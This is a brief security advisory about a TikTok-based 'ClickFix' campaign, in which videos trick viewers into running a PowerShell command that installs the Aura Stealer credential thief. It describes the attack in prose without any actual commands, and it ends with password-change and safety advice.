414/68 Tuesday, October 21, 2025
Threat actors are using the popular short-video platform TikTok to distribute information-stealing malware by posting short clips that claim to teach viewers how to unlock or activate software and services for free – for example, Windows, Microsoft 365, Adobe Photoshop, Spotify Premium, and Netflix. The technique used in these attacks is called “ClickFix,” a form of social-engineering attack that tricks users into copying and running malicious scripts or commands themselves under the pretext of “fixing” or activating a program.
The attackers display a single short command line in the video and instruct viewers to paste and run it in PowerShell with administrator privileges. When executed, that command connects to a remote server to download and run a second-stage script, which installs the information stealer known as “Aura Stealer.” Aura Stealer is capable of harvesting a wide range of sensitive data stored on the victim’s machine, including browser passwords, authentication cookies, cryptocurrency wallet data, and other application credentials, then exfiltrating those items back to the attackers.
If you followed instructions from one of these videos, assume account credentials may already be compromised and immediately change the passwords for any affected services. As a general safety rule, never copy and paste commands from untrusted websites, videos, or messages into Command Prompt, PowerShell, or Terminal. ClickFix-style attacks have grown significantly over the past year and are being used to distribute many types of malware for purposes such as ransomware and theft of digital assets.
